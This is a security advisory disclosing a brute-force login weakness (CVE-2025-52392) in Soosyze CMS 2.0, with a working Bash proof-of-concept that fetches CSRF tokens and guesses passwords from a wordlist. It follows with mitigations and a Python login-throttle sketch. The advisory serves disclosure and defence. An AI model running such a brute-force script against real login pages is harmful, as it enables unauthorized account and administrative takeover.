Brute Force Login Vulnerability in Soosyze CMS 2.0 (CVE-2025-52392)
Author: Beatriz Fresno Naumova (beafn28)
Date: 13/08/2025
Vendor: Soosyze
Product: Soosyze CMS
Version Affected: 2.0 (confirmed)
Component: /user/login – Authentication Controller
CWE: CWE-307: Improper Restriction of Excessive Authentication Attempts
Attack Vector: Remote (network exploitable)
Description
Soosyze CMS 2.0 contains a vulnerability in the /user/login authentication endpoint that allows unlimited credential-guessing attempts due to the absence of rate limiting and account lockout mechanisms.
A remote, unauthenticated attacker can submit unlimited HTTP POST requests with varying passwords for a known username/email without triggering any throttling, delay, or lockout.
The vulnerability can be exploited using automated tools such as THC Hydra, Burp Suite Intruder, or custom scripts, enabling brute-force attacks that may lead to compromise of administrative accounts.
Testing confirmed that the server issues a valid login form and CSRF token on every request, and accepts repeated authentication attempts without introducing timing penalties or invalidating sessions.
No vendor patch or mitigation was available at the time of publication.
Impact
Successful exploitation may allow:
Account Compromise: Unauthorized access to valid user accounts.
Administrative Takeover: Full compromise of the CMS instance if administrative credentials are obtained.
Data Exposure/Modification: Unrestricted access to protected content and potential injection of malicious configurations or content.
Attack Details
Attack Vector (AV): Network (N)
Attack Complexity (AC): Low (L)
Privileges Required (PR): None (N)
User Interaction (UI): Required (R)
Scope (S): Unchanged (U)
Confidentiality (C): Low (L)
Integrity (I): Low (L)
Availability (A): None (N)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
CVSS v3.1 Base Score: 5.4 (Medium)
Proof of Concept (PoC)
Overview
The following PoC demonstrates a brute-force authentication vulnerability in Soosyze CMS 2.0 at the /user/login endpoint.
The issue is caused by missing rate limiting and account lockout mechanisms, allowing an attacker to try unlimited password guesses.
Steps to Reproduce
Deploy or access a Soosyze CMS 2.0 instance.
Identify a valid username or email address (e.g., test@test.com).
Prepare a password dictionary (e.g., rockyou.txt).
Execute the provided Bash PoC script to perform automated POST login attempts.
PoC Script
#!/usr/bin/env bash
# Author: Beatriz Fresno Naumova (beafn28)
# Usage:
#   ./poc.sh [wordlist.txt]
# If no wordlist is provided, a small built-in list of common passwords is used.
set -euo pipefail

BASE_URL="http://localhost:8000"
LOGIN_PATH="/user/login"
EMAIL_FIELD="email"
PASS_FIELD="password"
TARGET_EMAIL="test@test.com"
WORDLIST_FILE="${1:-}"
DEFAULT_WORDS=("123456" "admin" "password" "qwerty" "letmein" "admin123" "password1")

form_url="$BASE_URL$LOGIN_PATH"

# Per-run temporary files (cookie jar, fetched form, last response), removed on exit.
COOKIE_JAR="$(mktemp)"
PAGE_FILE="$(mktemp)"
RESP_FILE="$(mktemp)"
trap 'rm -f "$COOKIE_JAR" "$PAGE_FILE" "$RESP_FILE"' EXIT

# Fetch the login form so the server hands out a session cookie and a fresh CSRF token.
get_form() {
    curl -sS -c "$COOKIE_JAR" -b "$COOKIE_JAR" "$form_url" > "$PAGE_FILE"
}

# Locate the hidden input whose name contains "token" or "csrf" and print "name<TAB>value".
extract_token() {
    local name value
    name=$(sed -nE 's/.*name="([_a-zA-Z0-9:-]*(token|csrf)[_a-zA-Z0-9:-]*)".*type="hidden".*/\1/p' "$PAGE_FILE" | head -n1 || true)
    value=""
    if [[ -n "$name" ]]; then
        value=$(sed -nE "s/.*name=\"$name\".*value=\"([^\"]*)\".*/\1/p" "$PAGE_FILE" | head -n1 || true)
    fi
    printf '%s\t%s\n' "$name" "$value"
}

# Submit one login attempt; prints the HTTP status code, the body goes to RESP_FILE.
post_login() {
    local pass="$1" tname="$2" tval="$3"
    local -a data=(--data-urlencode "$EMAIL_FIELD=$TARGET_EMAIL" --data-urlencode "$PASS_FIELD=$pass")
    if [[ -n "$tname" && -n "$tval" ]]; then
        data+=(--data-urlencode "$tname=$tval")
    fi
    curl -sS -o "$RESP_FILE" -w "%{http_code}" \
        -c "$COOKIE_JAR" -b "$COOKIE_JAR" \
        -X POST "$form_url" \
        -H "Content-Type: application/x-www-form-urlencoded" \
        -H "Origin: $BASE_URL" -H "Referer: $form_url" \
        "${data[@]}"
}

echo "[*] Starting brute-force attack on $form_url"
if [[ -n "$WORDLIST_FILE" && -r "$WORDLIST_FILE" ]]; then
    mapfile -t words < "$WORDLIST_FILE"
else
    words=("${DEFAULT_WORDS[@]}")
fi

i=0
for pw in "${words[@]}"; do
    i=$((i+1))
    get_form                                  # new form and token for every attempt
    IFS=$'\t' read -r TOKEN_NAME TOKEN_VALUE < <(extract_token)
    code=$(post_login "$pw" "$TOKEN_NAME" "$TOKEN_VALUE")
    # Success indicator: the response body contains a "redirect" key.
    if grep -q '"redirect"' "$RESP_FILE"; then
        echo -e "[$i] Password found: '\e[1m$pw\e[0m' (HTTP $code)"
        break
    else
        echo "[$i] '$pw' (HTTP $code)"
    fi
    sleep 0.$((RANDOM%9+1))                   # small random jitter between attempts
done
Execution example
./poc.sh rockyou.txt
Mitigation
Implement server-side rate limiting on /user/login keyed by source IP and by target account (e.g., maximum 5 failed attempts per minute per IP); a per-IP limit alone is bypassed by an attacker rotating source addresses.
Apply a temporary, progressively increasing account lockout (or delay) after multiple consecutive failed attempts, kept short enough that it cannot be abused to lock legitimate users out of their accounts.
Introduce CAPTCHA or other bot-mitigation mechanisms after repeated failed logins.
Log and monitor repeated failed authentication attempts per account and per source IP, and alert on bursts of failures against a single account.
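As an added illustration of the first two mitigations (this is example code written for this page, not Soosyze code and not part of the original advisory), the following Python sketch implements a login throttle that combines a per-IP sliding window (5 failures per 60 seconds) with a per-account lockout whose duration doubles on each repeat, and then replays the PoC's guessing loop against it. The policy values, the names (LoginThrottle, attempt_login, simulate_bruteforce), the injected clock and the simulated attacker are all assumptions made for the example.

```python
from collections import defaultdict, deque

# Policy values are assumptions for this example, not Soosyze defaults.
IP_WINDOW_SECONDS = 60
IP_MAX_FAILURES = 5            # "maximum 5 failed attempts per minute per IP"
ACCOUNT_LOCK_THRESHOLD = 5     # consecutive failures before the account is locked
ACCOUNT_LOCK_BASE_SECONDS = 60 # first lockout length; doubles on each further lockout


class LoginThrottle:
    """Server-side guard to consult before and after password verification."""

    def __init__(self):
        self._ip_failures = defaultdict(deque)   # ip -> timestamps of recent failures
        self._acct_failures = defaultdict(int)   # account -> consecutive failures
        self._acct_locked_until = {}             # account -> time the lock expires
        self._acct_lockouts = defaultdict(int)   # account -> lockouts issued so far
        self.events = []                         # audit trail for logging/monitoring

    def _prune(self, ip, now):
        q = self._ip_failures[ip]
        while q and now - q[0] >= IP_WINDOW_SECONDS:
            q.popleft()

    def check(self, ip, account, now):
        """Return (allowed, reason). Call BEFORE verifying the password."""
        self._prune(ip, now)
        if len(self._ip_failures[ip]) >= IP_MAX_FAILURES:
            self.events.append(("ip_throttled", ip, account, now))
            return False, "ip_rate_limited"
        if now < self._acct_locked_until.get(account, 0):
            self.events.append(("account_locked", ip, account, now))
            return False, "account_locked"
        return True, "ok"

    def record_failure(self, ip, account, now):
        """Count a failed attempt; returns the lockout length if one was just imposed."""
        self._ip_failures[ip].append(now)
        self._acct_failures[account] += 1
        self.events.append(("login_failed", ip, account, now))
        if self._acct_failures[account] >= ACCOUNT_LOCK_THRESHOLD:
            n = self._acct_lockouts[account]
            duration = ACCOUNT_LOCK_BASE_SECONDS * (2 ** n)   # 60, 120, 240, ...
            self._acct_locked_until[account] = now + duration
            self._acct_lockouts[account] = n + 1
            self._acct_failures[account] = 0
            self.events.append(("account_lockout", ip, account, now))
            return duration
        return 0

    def record_success(self, ip, account, now):
        self._acct_failures[account] = 0
        self.events.append(("login_ok", ip, account, now))


def attempt_login(throttle, ip, account, password, now, verify):
    """Throttled login flow: check, verify, record. Returns a short outcome string."""
    allowed, reason = throttle.check(ip, account, now)
    if not allowed:
        return reason                      # the password is never even examined
    if verify(account, password):
        throttle.record_success(ip, account, now)
        return "success"
    throttle.record_failure(ip, account, now)
    return "bad_credentials"


def simulate_bruteforce(wordlist, correct_password, rotate_ips=False,
                        account="test@test.com"):
    """Replay the PoC's loop (one guess per second) against the throttle.

    Returns (outcome, number of guesses that reached password verification).
    With rotate_ips=True every guess comes from a different source address,
    which defeats the per-IP limit but not the per-account lockout.
    """
    throttle = LoginThrottle()
    verify = lambda acct, pw: pw == correct_password   # stand-in for a real hash check
    verified = 0
    for i, pw in enumerate(wordlist):
        ip = "198.51.100.%d" % (i % 200 + 1) if rotate_ips else "203.0.113.10"
        result = attempt_login(throttle, ip, account, pw, now=float(i), verify=verify)
        if result in ("success", "bad_credentials"):
            verified += 1
        if result == "success":
            return "success", verified
    return "blocked", verified


if __name__ == "__main__":
    guesses = ["x%d" % i for i in range(50)]            # constructed wordlist
    print(simulate_bruteforce(guesses, "hunter2"))                    # ('blocked', 5)
    print(simulate_bruteforce(guesses, "hunter2", rotate_ips=True))   # ('blocked', 5)
```

The check runs before the password is compared, so a throttled request costs the server nothing and gives the attacker no oracle; the same code path should be taken for accounts that do not exist, so the throttle cannot be used for username enumeration. The events list is what the logging/monitoring recommendation above would consume.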
Discoverer
Beatriz Fresno Naumova (beafn28)
References
CVE: CVE-2025-52392